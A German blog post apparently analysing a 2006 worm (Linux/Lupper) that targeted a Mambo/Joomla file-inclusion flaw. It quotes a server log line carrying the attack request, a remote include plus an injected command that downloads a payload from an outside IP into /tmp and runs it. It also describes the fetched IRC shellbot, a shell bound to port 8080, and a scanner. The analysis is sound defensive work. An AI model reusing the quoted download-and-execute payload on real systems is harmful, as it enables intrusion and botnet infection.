Neuer Mambo-Wurm?

Beim Blick in die Log­files fie­len ver­schie­de­ne Log­ein­trä­ge auf - ir­gend­je­mand (oder -et­was) sucht nach einer seit No­vem­ber be­kann­ten Schwach­stel­le im Mambo/Joom­la CMS. Es gab be­reits einen Wurm, der diese Lücke aus­nutzt: Elx­Bot such­te al­ler­dings via Goog­le nach ver­wund­ba­ren Ser­vern. Da auf mei­nen Kis­ten je­doch kein Mambo in­stal­liert ist, kön­nen meine Ma­schi­nen wohl kaum via Goog­le als sol­che iden­ti­fi­ziert wer­den...
Up­date: Wä­hend McA­fee nur die all­ge­mei­nen Vi­ren-/Wurm-Tei­le iden­ti­fi­zie­ren konn­te, brach­te der On­line-Scan­ner von Kas­per­s­ky nä­he­res zu Tage: Er iden­ti­fi­zier­te das Bi­na­ry mit der Kern­funk­tio­na­li­tät als Net-Worm.​Linux.​Mare.d alias Linux/Lup­per-H - be­kannt seit drei Tagen. Trotz­dem war das Er­stel­len der fol­gen­den Ana­ly­se recht in­ter­es­sant.

Die Log­ein­trä­ge sehen fol­gen­der­ma­ßen aus (ge­sucht wird in wei­te­ren Pfa­den):
xxx.xxx.xxx.xxx - - [19/Feb/2006:08:19:20 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&
GLOBALS=&mosConfig_absolute_path=http://198.170.105.69/c.gif?&
cmd=cd%20/tmp;wget%20198.170.105.69/supina;chmod%20744%20supina;
./supina;echo%20YYY;echo| HTTP/1.1"

Aus Neu­gier­de habe ich ein­mal "Mambo ge­spielt" und die an­ge­ge­be­ne Datei "su­pi­na" vom Ser­ver 198.​170.​105.​69 her­un­ter­ge­la­den. Ob­wohl der Scan be­reits einen Tag her war, war der Ser­ver noch immer er­reich­bar...
Sie ent­hält ein bash-Skript, das zu­nächst das /tmp-Ver­zeich­nis leert und an­schlie­ßend mit­tels wget und curl vom sel­ben Ser­ver wei­te­re Da­tei­en nach­läd:
"cb" ist ein Bi­na­ry, das vom McA­fee-Scan­ner als Linux/Rst.b virus klas­si­fi­ziert wird.
Ein Perl-Skript na­mens "https" (als "Perl/Shell­bot tro­jan" iden­ti­fi­ziert) öff­net einen IRC-Chan­nel des un­der­net-IRC-Netz­werks, umd auf wei­te­re Kom­man­dos zu war­ten.
Ein wei­te­res Perl-Skript na­mens "ping.​txt" bin­det eine Shell (/bin/sh) an Port 8080.
Zu guter letzt wird ein 400k gro­ßes Li­nux-Bi­na­ry na­mens httpd nach­ge­la­den und ge­star­tet; ich habe es zwar nicht mit einem De­bug­ger ana­ly­siert, die Aus­ga­be von "strings" läßt je­doch fol­gen­de Ver­mu­tun­gen zu: Es scannt nach wei­te­ren ver­wund­ba­ren Hosts, und zwar so­wohl nach Mam­bo-In­stal­la­tio­nen als auch nach ver­schie­de­nen Blogg-Sys­te­men mit der XML­RPC-Schwach­stel­le. Des­wei­te­ren gibt es Sta­tus­mel­dun­gen, die ir­gend­ei­ne Up­date-Mög­lich­keit ver­mu­ten las­sen.